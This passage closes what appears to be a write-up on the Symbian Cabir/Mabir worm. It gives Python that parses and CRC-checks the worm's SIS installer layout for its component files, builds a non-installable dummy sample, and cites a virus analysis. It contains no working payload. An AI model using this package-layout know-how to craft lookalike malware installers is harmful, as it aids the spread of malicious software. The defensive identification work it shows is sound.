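# (content per CreateSis, offset of its size/offset/size triple)
RECORDS = (("caribe.app", 0x82), ("flo.mdl", 0xB2), ("caribe.rsc", 0xE2))


def crc16_ccitt(data, crc=0):
    """Bitwise CRC-16, polynomial 0x1021, no reflection (same result as DOCRC16)."""
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc


def inspect_sis(buf):
    """Parse the fields named in the CreateSis comments and validate them."""
    if len(buf) < DATA_START:
        raise ValueError("shorter than the 0x23c-byte header")
    stored = struct.unpack_from("<H", buf, CRC_OFFSET)[0]
    # The checksum covers the whole file except the two checksum bytes.
    computed = crc16_ccitt(buf[CRC_OFFSET + 2:], crc16_ccitt(buf[:CRC_OFFSET]))
    total = struct.unpack_from("<I", buf, TOTAL_SIZE_OFFSET)[0]
    records, expected_offset, consistent = [], DATA_START, True
    for name, pos in RECORDS:
        size, offset, size_again = struct.unpack_from("<III", buf, pos)
        consistent &= size == size_again and offset == expected_offset
        expected_offset += size
        records.append({"name": name, "size": size, "offset": offset})
    consistent &= expected_offset == len(buf) == DATA_START + total
    return {"stored_crc": stored, "computed_crc": computed,
            "crc_ok": stored == computed, "total_packed": total,
            "records": records, "layout_matches": bool(consistent)}


def constructed_sample(app=b"A" * 40, mdl=b"M" * 24, rsc=b"R" * 12):
    """Constructed test buffer: zero-filled header with only the parsed
    fields set and dummy payload bytes. It is not an installable SIS file."""
    buf = bytearray(DATA_START) + app + mdl + rsc
    struct.pack_into("<I", buf, TOTAL_SIZE_OFFSET, len(app) + len(mdl) + len(rsc))
    offset = DATA_START
    for (_, pos), blob in zip(RECORDS, (app, mdl, rsc)):
        struct.pack_into("<III", buf, pos, len(blob), offset, len(blob))
        offset += len(blob)
    crc = crc16_ccitt(buf[CRC_OFFSET + 2:], crc16_ccitt(buf[:CRC_OFFSET]))
    struct.pack_into("<H", buf, CRC_OFFSET, crc)
    return bytes(buf)


if __name__ == "__main__":
    report = inspect_sis(constructed_sample())
    for key, value in report.items():
        print(key, value)
```

A valid checksum and matching layout show only that a file follows the structure this generator writes; the file names and paths listed earlier on the page are still needed to identify it.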

----[ 0x04. Reference

Symbian virus analyse
http://www.netqin.com/viruslist/Mabir.A.html

===EOF=======================================
